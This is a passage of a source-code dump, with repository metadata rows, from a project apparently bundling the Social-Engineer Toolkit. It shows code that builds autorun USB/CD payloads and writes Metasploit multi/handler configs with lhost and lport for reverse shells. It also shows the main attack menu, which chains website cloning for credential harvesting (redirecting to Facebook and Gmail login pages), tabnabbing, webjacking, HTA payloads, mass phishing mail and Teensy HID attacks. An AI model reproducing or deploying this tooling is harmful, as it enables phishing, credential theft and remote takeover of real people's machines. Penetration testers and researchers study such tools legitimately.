trigger = 3
if not os.path.isdir(autorun_path):
os.makedirs(autorun_path)
with open(os.path.join(autorun_path, "autorun.inf"), 'w') as filewrite:
# if using standard payloads
if trigger == 1:
payload = "program.exe" # "" + alpha_data + "\""
# if using pdf payload
elif trigger == 2:
payload = "template.pdf"
elif trigger == 3:
payload = "openthis.wab"
else:
payload = ""
filewrite.write("""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))
core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
if trigger in [1, 2, 3]:
choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(os.path.join(core.userconfigpath, "meta_config")):
with open(os.path.join(core.userconfigpath, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.userconfigpath, "payload.options")) as fileopen:
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload {0}\n".format(line[0]))
filewrite.write("set lhost {0}\n".format(line[1]))
filewrite.write("set lport {0}\n".format(line[2]))
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
# create the listener
core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.userconfigpath, "meta_config")),
shell=True).wait()
else:
core.print_warning("cancelling...")
sleep(2)
| 4,064 | Python | .py | 77 | 40.194805 | 117 | 0.564593 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,835 | webserver.py | CHEGEBB_africana-framework/externals/set/src/core/webserver.py | import http.server
import http.server
import http.client
import os
import sys
from src.core.setcore import *
# specify the web port
web_port = check_config("WEB_PORT=")
class StoppableHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
"""http request handler with QUIT stopping the server"""
def do_QUIT(self):
"""send 200 OK response, and set server.stop to True"""
self.send_response(200)
self.end_headers()
self.server.stop = True
def do_POST(self):
# We could also process paremeters here using something like below.
self.do_GET()
def send_head(self):
# This is ripped directly from SimpleHTTPRequestHandler, only the
# cookie part is added.
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith('/'):
# redirect browser - doing basically what apache does
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
if ctype.startswith('text/'):
mode = 'r'
else:
mode = 'rb'
try:
f = open(path, mode)
except IOError:
self.send_error(404, "File not found")
return None
self.send_response(200)
self.send_header("Content-type", ctype)
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
class StoppableHttpServer(http.server.HTTPServer):
"""http server that reacts to self.stop flag"""
def serve_forever(self):
"""Handle one request at a time until stopped."""
self.stop = False
while not self.stop:
self.handle_request()
# stop the http server
def stop_server(web_port):
try:
web_port = int(web_port)
"""send QUIT request to http server running on localhost:<port>"""
conn = http.client.HTTPConnection("localhost:%d" % web_port)
conn.request("QUIT", "/")
conn.getresponse()
except: pass
# start the http server
def start_server(web_port, path):
try:
os.chdir(path)
web_port = int(web_port)
server = StoppableHttpServer(('', web_port), StoppableHttpRequestHandler)
server.serve_forever()
except: pass
| 3,201 | Python | .py | 85 | 28.823529 | 81 | 0.611541 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,836 | module_handler.py | CHEGEBB_africana-framework/externals/set/src/core/module_handler.py | #!/usr/bin/env python3
# module_handler.py
import glob
import re
import sys
from src.core.setcore import *
# this is just if the user wants to return to menu
menu_return = "false"
# base counter to identify numbers
counter = 0
# get the menu going
print("\n")
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
print_info_spaces(
"Please read the readme/modules.txt for information on how to create your own modules.\n")
for name in glob.glob("modules/*.py"):
counter = counter + 1
fileopen = open(name, "r")
for line in fileopen:
line = line.rstrip()
match = re.search("MAIN=", line)
if match:
line = line.replace('MAIN="', "")
line = line.replace('"', "")
line = " " + str(counter) + ". " + line
print(line)
print("\n 0. Return to the previous menu\n")
choice = raw_input(setprompt(["9"], ""))
if choice == 'exit':
exit_set()
if choice == '0':
menu_return = "true"
# throw error if not integer
try:
choice = int(choice)
except:
print_warning("An integer was not used try again")
choice = raw_input(setprompt(["9"], ""))
# start a new counter to match choice
counter = 0
if menu_return == "false":
# pull any files in the modules directory that starts with .py
for name in glob.glob("modules/*.py"):
counter = counter + 1
if counter == int(choice):
# get rid of .modules extension
name = name.replace("modules/", "")
# get rid of .py extension
name = name.replace(".py", "")
# changes our system path to modules so we can import the files
sys.path.append("modules/")
# this will import the third party module
try:
exec("import " + name)
except:
pass
# this will call the main() function inside the python file
# if it doesn't exist it will still continue just throw a warning
try:
exec("%s.main()" % (name))
# handle the exception if main isn't there
except Exception as e:
raw_input(" [!] There was an issue with a module: %s." % (e))
return_continue()
| 2,277 | Python | .py | 64 | 28.359375 | 94 | 0.595444 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,837 | set.py | CHEGEBB_africana-framework/externals/set/src/core/set.py | #!/usr/bin/env python3
#
#
# The Social-Engineer Toolkit
# Written by: David Kennedy (ReL1K)
#
#
import shutil
import os
import time
import re
import sys
import socket
from src.core.setcore import *
from src.core.menu import text
try:
raw_input
except:
raw_input = input
ipaddr = ""
me = mod_name()
#
# Define path and set it to the SET root dir
#
definepath = os.getcwd()
sys.path.append(definepath)
#
# ROOT CHECK
#
# grab the operating system
operating_system = check_os()
# grab metasploit path
msf_path = meta_path()
if operating_system == "posix":
if os.geteuid() != 0:
print(
"\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)")
print(
"\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n")
sys.exit(1)
define_version = get_version()
try:
while 1:
show_banner(define_version, '1')
#
# USER INPUT: SHOW MAIN MENU #
#
debug_msg(me, "printing 'text.main'", 5)
show_main_menu = create_menu(text.main_text, text.main)
# special case of list item 0
print('\n 0) Return back to the main menu.\n')
main_menu_choice = (raw_input(setprompt("0", "")))
if main_menu_choice == 'exit':
break
if operating_system == "windows" or msf_path == False:
if main_menu_choice == "1" or main_menu_choice == "4" or main_menu_choice == "8" or main_menu_choice == "3":
print_warning(
"Sorry. This feature is not yet supported in Windows or Metasploit was not found.")
return_continue()
break
if main_menu_choice == '1': # 'Spearphishing Attack Vectors
while 1:
#
# USER INPUT: SHOW SPEARPHISH MENU #
#
if operating_system != "windows":
debug_msg(me, "printing 'text.spearphish_menu'", 5)
show_spearphish_menu = create_menu(
text.spearphish_text, text.spearphish_menu)
spearphish_menu_choice = raw_input(setprompt(["1"], ""))
if spearphish_menu_choice == 'exit':
exit_set()
if spearphish_menu_choice == 'help':
print(text.spearphish_text)
# Spearphish menu choice 1: Perform a Mass Email Attack
if spearphish_menu_choice == '1':
sys.path.append(definepath + "/src/core/msf_attacks/")
debug_msg(
me, "importing 'src.core.msf_attacks.create_payload'", 1)
try:
module_reload(create_payload)
except:
pass
import create_payload
# Spearphish menu choice 2: Create a FileFormat Payload
if spearphish_menu_choice == '2':
sys.path.append(definepath + "/src/core/msf_attacks/")
debug_msg(
me, "importing 'src.core.msf_attacks.create_payload'", 1)
try:
reload(create_payload)
except:
import create_payload
# Spearphish menu choice 3: Create a Social-Engineering
# Template
if spearphish_menu_choice == '3':
debug_msg(
me, "calling function 'custom_template' from 'src.core.setcore'", 3)
custom_template()
# Spearphish menu choice 0
if spearphish_menu_choice == '0':
break
#
# Web Attack Menu
#
# Main Menu choice 2: Website Attack Vectors
if main_menu_choice == '2':
while 1:
#
# USER INPUT: SHOW WEB ATTACK MENU #
#
debug_msg(me, "printing 'text.webattack_menu'", 5)
show_webattack_menu = create_menu(
text.webattack_text, text.webattack_menu)
attack_vector = raw_input(setprompt(["2"], ""))
choice3 = ""
if attack_vector == 'exit':
exit_set()
if attack_vector == "":
debug_msg(
me, "no attack vector entered, defaulting to '1) Java Applet Attack Method'", 3)
attack_vector = "1"
# check unsupported features
if operating_system == "windows" or msf_path == False:
if attack_vector == "2" or attack_vector == "9":
print_warning(
"Sorry. This option is not yet available in Windows or Metasploit was not found.")
return_continue()
break
# Web Attack menu choice 9: Return to the Previous Menu
if attack_vector == '0':
break
try:
attack_check = int(attack_vector)
except:
print_error("ERROR:Invalid selection, going back to menu.")
break
if attack_check > 9:
print_warning("Invalid option")
return_continue()
break
#
# HTA ATTACK VECTOR METHOD HERE
#
# if attack_vector == '8':
# assign HTA attack vector - do more later
# attack_vector = "hta"
# Removed to delete MLITM
#if attack_vector != "0000":
#
# USER INPUT: SHOW WEB ATTACK VECTORS MENU #
#
#if attack_vector != "7":
debug_msg(me, "printing 'text.webattack_vectors_menu'", 5)
show_webvectors_menu = create_menu(text.webattack_vectors_text, text.webattack_vectors_menu)
print(' 0) Return to Webattack Menu\n')
choice3 = raw_input(setprompt(["2"], ""))
if choice3 == 'exit':
exit_set()
if choice3 == "0":
break
if choice3 == "quit" or choice3 == '4':
break
try:
# write our attack vector to file to be called later
filewrite = open(userconfigpath + "attack_vector", "w")
# webjacking and web templates are not allowed
if attack_vector == "5" and choice3 == "1":
print(bcolors.RED + "\n Sorry, you can't use the Web Jacking vector with Web Templates." + bcolors.ENDC)
return_continue()
break
# if we select multiattack, web templates are not allowed
if attack_vector == "6" and choice3 == "1":
print(bcolors.RED + "\n Sorry, you can't use the Multi-Attack vector with Web Templates." + bcolors.ENDC)
return_continue()
break
# if we select web template and tabnabbing, throw this
# error and bomb out to menu
if attack_vector == "4" and choice3 == "1":
print(bcolors.RED + "\n Sorry, you can only use the cloner option with the tabnabbing method." + bcolors.ENDC)
return_continue()
break
# if attack vector is default or 1 for java applet
if attack_vector == '':
attack_vector = '1'
# specify java applet attack
if attack_vector == '1':
attack_vector = "java"
filewrite.write(attack_vector)
filewrite.close()
# specify browser exploits
if attack_vector == '2':
attack_vector = "browser"
filewrite.write(attack_vector)
filewrite.close()
if attack_vector == '':
attack_vector = '3'
# specify web harvester method
if attack_vector == '3':
attack_vector = "harvester"
filewrite.write(attack_vector)
filewrite.close()
print_info("Credential harvester will allow you to utilize the clone capabilities within SET")
print_info("to harvest credentials or parameters from a website as well as place them into a report")
# specify tab nabbing attack vector
if attack_vector == '4':
attack_vector = "tabnabbing"
filewrite.write(attack_vector)
filewrite.close()
# specify webjacking attack vector
if attack_vector == "5":
attack_vector = "webjacking"
filewrite.write(attack_vector)
filewrite.close()
# specify Multi-Attack Vector
attack_vector_multi = ""
if attack_vector == '6':
# trigger the multiattack flag in SET
attack_vector = "multiattack"
# write the attack vector to file
filewrite.write(attack_vector)
filewrite.close()
# hta attack vector
if attack_vector == '7':
# call hta attack vector
attack_vector = "hta"
filewrite.write(attack_vector)
filewrite.close()
# pull ip address
if choice3 != "-1":
fileopen = open(
"/etc/setoolkit/set.config", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("AUTO_DETECT=ON", line)
if match:
try:
ipaddr = socket.socket(
socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr = ipaddr.getsockname()[0]
update_options("IPADDR=" + ipaddr)
except Exception as error:
log(error)
ipaddr = raw_input(
setprompt(["2"], "Your interface IP Address"))
update_options("IPADDR=" + ipaddr)
# if AUTO_DETECT=OFF prompt for IP Address
for line in fileopen:
line = line.rstrip()
match = re.search("AUTO_DETECT=OFF", line)
if match:
if attack_vector != "harvester":
if attack_vector != "tabnabbing":
if attack_vector != "webjacking":
if attack_vector != "hta":
# this part is to determine if NAT/port forwarding is used
# if it is it'll prompt for
# additional questions
print_info("NAT/Port Forwarding can be used in the cases where your SET machine is")
print_info("not externally exposed and may be a different IP address than your reverse listener.")
nat_or_fwd = yesno_prompt('0', 'Are you using NAT/Port Forwarding [yes|no]')
if nat_or_fwd == "YES":
ipquestion = raw_input(setprompt(["2"], "IP address to SET web server (this could be your external IP or hostname)"))
filewrite2 = open(userconfigpath + "interface", "w")
filewrite2.write(ipquestion)
filewrite2.close()
# is your payload/listener
# on a different IP?
natquestion = yesno_prompt(["2"], "Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]")
if natquestion == 'YES':
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse handler (reverse payload)"))
if natquestion == "NO":
ipaddr = ipquestion
# if you arent using NAT/Port
# FWD
if nat_or_fwd == "NO":
ipaddr = grab_ipaddress()
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
print("""
-------------------------------------------------------------------------------
--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---
The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really
important:
If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.
""")
try:
revipaddr = detect_public_ip()
ipaddr = raw_input(setprompt(["2"], "IP address for the POST back in Harvester/Tabnabbing [" + revipaddr + "]"))
if ipaddr == "": ipaddr=revipaddr
except Exception:
rhost = raw_input("Enter the IP address for POST back in Harvester/Tabnabbing: ")
ipaddr = rhost
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
update_options("IPADDR=" + ipaddr)
else:
if ipaddr != "":
update_options("IPADDR=" + ipaddr)
# if java applet attack
if attack_vector == "java":
applet_choice()
# Select SET quick setup
if choice3 == '1':
# get the template ready
sys.path.append(definepath + "/src/html/templates")
debug_msg(me, "importing src.html.templates.template'", 1)
try:
module_reload(template)
except:
import template
# grab browser exploit selection
if attack_vector == "browser":
# grab clientattack
sys.path.append(
definepath + "/src/webattack/browser_exploits")
debug_msg(me, "line 357: importing 'src.webattack.browser_exploits.gen_payload'", 1)
try:
module_reload(gen_payload)
except:
import gen_payload
# arp cache attack, will exit quickly
# if not in config file
sys.path.append(definepath + "/src/core/arp_cache")
debug_msg(me, "line 364: importing 'src.core.arp_cache.arp'", 1)
try:
module_reload(arp)
except:
import arp
# actual website attack here
# web_server.py is main core
sys.path.append(definepath + "/src/html/")
# clean up stale file
if os.path.isfile(userconfigpath + "cloner.failed"):
os.remove(userconfigpath + "cloner.failed")
site_cloned = True
debug_msg(me, "line 375: importing 'src.webattack.web_clone.cloner'", 1)
try:
module_reload(src.webattack.web_clone.cloner)
except:
import src.webattack.web_clone.cloner
# grab java applet attack
if attack_vector == "java":
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
if os.path.isfile(userconfigpath + "cloner.failed"):
site_cloned = False
if site_cloned == True:
# cred harvester for auto site here
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
if attack_vector == "tabnabbing" or attack_vector == "webjacking":
debug_msg(
me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
module_reload(src.webattack.tabnabbing)
except:
import src.webattack.tabnabbing
# start web cred harvester here
debug_msg(
me, "importing 'src.webattack.harvester.harvester'", 1)
sys.path.append(
definepath + "/src/webattack/harvester/")
try:
module_reload(harvester)
except:
import harvester
# if we are using profiler lets prep everything to
# get ready
if attack_vector == "profiler":
from src.webattack.profiler.webprofiler import *
prep_website()
# launch HTA attack vector after the website has
# been cloned
if attack_vector == "hta":
# launch HTA attack vector after the website
# has been cloned
from src.webattack.hta.main import *
# update config
update_options("ATTACK_VECTOR=HTA")
gen_hta_cool_stuff()
attack_vector = "hta"
print_status("Automatically starting Apache for you...")
subprocess.Popen("service apache2 start", shell=True).wait()
if attack_vector != "harvester":
if attack_vector != "tabnabbing":
if attack_vector != "multiattack":
if attack_vector != "webjacking":
if attack_vector != "multiattack":
if attack_vector != "profiler":
if attack_vector != "hta":
# spawn web server here
debug_msg(
me, "importing 'src.html.spawn'", 1)
import src.html.spawn
# multi attack vector here
if attack_vector == "multiattack":
if choice3 == "1":
try:
filewrite = open(
"src/progam_junk/multiattack.template", "w")
filewrite.write("TEMPLATE=TRUE")
filewrite.close()
except:
pass
debug_msg(
me, "importing 'src.webattack.multi_attack.multiattack'", 1)
import src.webattack.multi_attack.multiattack
# Create a website clone
if choice3 == '2':
# flag that we want a custom website
definepath = os.getcwd()
sys.path.append(
definepath + "/src/webattack/web_clone/")
if os.path.isfile(userconfigpath + "site.template"):
os.remove(userconfigpath + "site.template")
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM")
print_info("SET supports both HTTP and HTTPS")
# specify the site to clone
print_info("Example: http://www.thisisafakesite.com")
URL = raw_input(
setprompt(["2"], "Enter the url to clone"))
match = re.search("http://", URL)
match1 = re.search("https://", URL)
if not match:
if not match1:
URL = ("http://" + URL)
match2 = re.search("facebook.com", URL)
if match2:
URL = ("https://login.facebook.com/login.php")
# changed based on new landing page for gmail.com
match3 = re.search("gmail.com", URL)
if match3:
URL = ("https://accounts.google.com")
filewrite.write("\nURL=%s" % (URL))
filewrite.close()
# launch HTA attack vector after the website has been
# cloned
if attack_vector == "hta":
# launch HTA attack vector after the website has
# been cloned
from src.webattack.hta.main import *
# update config
update_options("ATTACK_VECTOR=HTA")
gen_hta_cool_stuff()
attack_vector = "hta"
print_status(
"Automatically starting Apache for you...")
subprocess.Popen(
"service apache2 start", shell=True).wait()
# grab browser exploit selection
if attack_vector == "browser":
# grab clientattack
sys.path.append(
definepath + "/src/webattack/browser_exploits")
debug_msg(
me, "importing 'src.webattack.browser_exploits.gen_payload'", 1)
try:
module_reload(gen_payload)
except:
import gen_payload
# set site cloner to true
site_cloned = True
if attack_vector != "multiattack":
# import our website cloner
site_cloned = True
debug_msg(
me, "importing 'src.webattack.web_clone.cloner'", 1)
try:
module_reload(src.webattack.web_clone.cloner)
except:
import src.webattack.web_clone.cloner
if os.path.isfile(userconfigpath + "cloner.failed"):
site_cloned = False
if site_cloned == True:
if attack_vector == "java":
# import our payload generator
debug_msg(
me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(
src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
# arp cache if applicable
definepath = os.getcwd()
sys.path.append(definepath + "/src/core/arp_cache")
debug_msg(
me, "line 500: importing 'src.core.arp_cache.arp'", 1)
try:
module_reload(arp)
except:
import arp
# tabnabbing and harvester selection here
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
if attack_vector == "tabnabbing" or attack_vector == "webjacking":
sys.path.append(
definepath + "/src/webattack/tabnabbing")
debug_msg(
me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
module_reload(tabnabbing)
except:
import tabnabbing
sys.path.append(
definepath + "/src/webattack/harvester")
debug_msg(
me, "importing 'src.webattack.harvester.harvester'", 1)
try:
module_reload(harvester)
except:
import harvester
# multi_attack vector here
if attack_vector == "multiattack":
sys.path.append(
definepath + "/src/webattack/multi_attack/")
debug_msg(
me, "importing 'src.webattack.multi_attack.multiattack'", 1)
try:
module_reload(multiattack)
except:
import multiattack
# if we arent using credential harvester or
# tabnabbing
if attack_vector != "harvester":
if attack_vector != "tabnabbing":
if attack_vector != "multiattack":
if attack_vector != "webjacking":
if attack_vector != "hta":
sys.path.append(
definepath + "/src/html")
debug_msg(
me, "importing 'src.html.spawn'", 1)
try:
module_reload(spawn)
except:
import spawn
# Import your own site
if choice3 == '3':
sys.path.append(
definepath + "/src/webattack/web_clone/")
if os.path.isfile(userconfigpath + "site.template"):
os.remove(userconfigpath + "site.template")
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=SELF")
# specify the site to clone
if not os.path.isdir(userconfigpath + "web_clone"):
os.makedirs(userconfigpath + "web_clone")
print_warning(
"Example: /home/website/ (make sure you end with /)")
print_warning(
"Also note that there MUST be an index.html in the folder you point to.")
URL = raw_input(
setprompt(["2"], "Path to the website to be cloned"))
if not URL.endswith("/"):
if not URL.endswith("index.html"):
URL = URL + "/"
if not os.path.isfile(URL + "index.html"):
if os.path.isfile(URL):
shutil.copyfile(
"%s" % (URL), userconfigpath + "web_clone/index.html")
if not os.path.isfile(URL):
if URL.endswith("index.html"):
shutil.copyfile(
URL, "%s/web_clone/index.html" % (userconfigpath))
else:
print_error("ERROR:index.html not found!!")
print_error(
"ERROR:Did you just put the path in, not file?")
print_error(
"Exiting the Social-Engineer Toolkit...Hack the Gibson.\n")
exit_set()
if os.path.isfile(URL + "index.html"):
print_status(
"Index.html found. Do you want to copy the entire folder or just index.html?")
choice = raw_input(
"\n1. Copy just the index.html\n2. Copy the entire folder\n\nEnter choice [1/2]: ")
if choice == "1" or choice == "":
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
os.remove("%s/web_clone/index.html" % (userconfigpath))
shutil.copyfile(URL + "index.html", "%s/web_clone/index.html" % (userconfigpath))
if choice == "2":
if os.path.isdir(URL + "src/webattack"):
print_error("You cannot specify a folder in the default SET path. This goes into a loop Try something different.")
URL = raw_input("Enter the folder to import into SET, this CANNOT be the SET directory: ")
if os.path.isdir(URL + "src/webattack" % (URL)):
print_error("You tried the same thing. Exiting now.")
sys.exit()
copyfolder(URL, "%s/web_clone/" % userconfigpath)
filewrite.write("\nURL=%s" % (URL))
filewrite.close()
# if not harvester then load up cloner
if attack_vector == "java" or attack_vector == "browser":
# import our website cloner
debug_msg(
me, "importing 'src.webattack.web_clone.cloner'", 1)
import src.webattack.web_clone.cloner
# launch HTA attack vector after the website has been
# cloned
if attack_vector == "hta":
# launch HTA attack vector after the website has
# been cloned
from src.webattack.hta.main import *
# update config
update_options("ATTACK_VECTOR=HTA")
gen_hta_cool_stuff()
attack_vector = "hta"
print_status(
"Automatically starting Apache for you...")
subprocess.Popen(
"service apache2 start", shell=True).wait()
# if java applet attack
if attack_vector == "java":
# import our payload generator
debug_msg(
me, "importing 'src.core.payloadgen.create_payloads'", 1)
import src.core.payloadgen.create_payloads
# grab browser exploit selection
if attack_vector == "browser":
# grab clientattack
sys.path.append(
definepath + "/src/webattack/browser_exploits")
debug_msg(
me, "importing 'src.webattack.browser_exploits.gen_payload'", 1)
try:
module_reload(gen_payload)
except:
import gen_payload
# arp cache if applicable
sys.path.append(definepath + "/src/core/arp_cache")
debug_msg(
me, "line 592: importing 'src.core.arp_cache.arp'", 1)
try:
module_reload(arp)
except:
import arp
# if not harvester spawn server
if attack_vector == "java" or attack_vector == "browser":
# import web_server and do magic
sys.path.append(definepath + "/src/html")
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
module_reload(spawn)
except:
import spawn
# cred harvester for auto site here
if attack_vector == "harvester":
# get the url
print_info("Example: http://www.blah.com")
URL = raw_input(
setprompt(["2"], "URL of the website you imported"))
match = re.search("http://", URL)
match1 = re.search("https://", URL)
if not match:
if not match1:
URL = ("http://" + URL)
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("\nURL=%s" % (URL))
filewrite.close()
# start web cred harvester here
sys.path.append(
definepath + "/src/webattack/harvester")
debug_msg(
me, "importing 'src.webattack.harvester.harvester'", 1)
try:
module_reload(harvester)
except:
import harvester
# tabnabbing for auto site here
if attack_vector == "tabnabbing" or attack_vector == "webjacking":
# get the url
print_info("Example: http://www.blah.com")
URL = raw_input(
setprompt(["2"], "URL of the website you imported"))
match = re.search("http://", URL)
match1 = re.search("https://", URL)
if not match:
if not match1:
URL = ("http://" + URL)
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("\nURL=%s" % (URL))
filewrite.close()
# start tabnabbing here
sys.path.append(
definepath + "/src/webattack/tabnabbing")
debug_msg(
me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
module_reload(tabnabbing)
except:
import tabnabbing
# start web cred harvester here
sys.path.append(
definepath + "/src/webattack/harvester")
debug_msg(
me, "importing 'src.webattack.harvester.harvester'", 1)
try:
module_reload(harvester)
except:
import harvester
# multi attack vector here
if attack_vector == "multiattack":
try:
filewrite = open(
"src/progam_junk/multiattack.template", "w")
filewrite.write("TEMPLATE=TRUE")
filewrite.close()
except:
pass
debug_msg(
me, "importing 'src.webattack.multi_attack.multiattack'", 1)
import src.webattack.multi_attack.multiattack
# Return to main menu
if choice3 == '4':
print (" Returning to main menu.\n")
break
except KeyboardInterrupt:
print(
" Control-C detected, bombing out to previous menu..")
break
# Define Auto-Infection USB/CD Method here
if main_menu_choice == '3':
#
# USER INPUT: SHOW INFECTIOUS MEDIA MENU #
#
# Main Menu choice 3: Infectious Media Generator
debug_msg(me, "printing 'text.infectious_menu'", 5)
show_infectious_menu = create_menu(
text.infectious_text, text.infectious_menu)
infectious_menu_choice = raw_input(setprompt(["3"], ""))
if infectious_menu_choice == 'exit':
exit_set()
if infectious_menu_choice == "0":
menu_back()
if infectious_menu_choice == "":
infectious_menu_choice = "1"
# if fileformat
if infectious_menu_choice == "1":
ipaddr = raw_input(
setprompt(["3"], "IP address for the reverse connection (payload)"))
update_options("IPADDR=" + ipaddr)
filewrite1 = open(userconfigpath + "payloadgen", "w")
filewrite1.write("payloadgen=solo")
filewrite1.close()
# if choice is file-format
if infectious_menu_choice == "1":
filewrite = open(userconfigpath + "fileformat.file", "w")
filewrite.write("fileformat=on")
filewrite.close()
sys.path.append(definepath + "/src/core/msf_attacks/")
debug_msg(
me, "importing 'src.core.msf_attacks.create_payload'", 1)
try:
module_reload(create_payload)
except:
import create_payload
# if choice is standard payload
if infectious_menu_choice == "2":
# trigger set options for infectious media
update_options("INFECTION_MEDIA=ON")
try:
import src.core.payloadgen.solo
except:
module_reload(src.core.payloadgen.solo)
# if we aren't exiting, then launch autorun
if infectious_menu_choice != "0":
try:
import src.autorun.autolaunch
except:
module_reload(src.autorun.autolaunch)
#
#
# Main Menu choice 4: Create a Payload and Listener
#
#
if main_menu_choice == '4':
update_options("PAYLOADGEN=SOLO")
import src.core.payloadgen.solo
# try: import src.core.payloadgen.solo
# except: module_reload(src.core.payloadgen.solo)
# if the set payload is there
if os.path.isfile(userconfigpath + "msf.exe"):
shutil.copyfile(userconfigpath + "msf.exe", "payload.exe")
return_continue()
# Main Menu choice 5: Mass Mailer Attack
if main_menu_choice == '5':
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_web'", 1)
try:
module_reload(src.phishing.smtp.client.smtp_web)
except:
import src.phishing.smtp.client.smtp_web
# Main Menu choice 6: Teensy USB HID Attack Vector
if main_menu_choice == '6':
#
# USER INPUT: SHOW TEENSY MENU #
#
debug_msg(me, "printing 'text.teensy_menu'", 5)
show_teensy_menu = create_menu(text.teensy_text, text.teensy_menu)
teensy_menu_choice = raw_input(setprompt(["6"], ""))
if teensy_menu_choice == 'exit':
exit_set()
# if not return to main menu
yes_or_no = ''
if teensy_menu_choice != "0":
# set our teensy info file in program junk
filewrite = open(userconfigpath + "teensy", "w")
filewrite.write(teensy_menu_choice + "\n")
if teensy_menu_choice != "3" and teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "13" and teensy_menu_choice != "14":
yes_or_no = yesno_prompt(
"0", "Do you want to create a payload and listener [yes|no]: ")
if yes_or_no == "YES":
filewrite.write("payload")
filewrite.close()
# load a payload
sys.path.append(definepath + "/src/core/payloadgen")
debug_msg(
me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(create_payloads)
except:
import create_payloads
if yes_or_no == "NO":
filewrite.close()
# need these default files for web server load
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("hid")
filewrite.close()
# if we are doing binary2teensy
if teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "14":
sys.path.append(definepath + "/src/teensy")
debug_msg(me, "importing 'src.teensy.teensy'", 1)
try:
module_reload(teensy)
except:
import teensy
if teensy_menu_choice == "7":
debug_msg(me, "importing 'src.teensy.binary2teensy'", 1)
import src.teensy.binary2teensy
# if we are doing sd2teensy attack
if teensy_menu_choice == "8":
debug_msg(me, "importing 'src.teensy.sd2teensy'", 1)
import src.teensy.sd2teensy
# if we are doing the sd2teensy osx attack
if teensy_menu_choice == "9":
print_status(
"Generating the SD2Teensy OSX ino file for you...")
if not os.path.isdir(userconfigpath + "reports/osx_sd2teensy"):
os.makedirs(userconfigpath + "reports/osx_sd2teensy")
shutil.copyfile("src/teensy/osx_sd2teensy.ino",
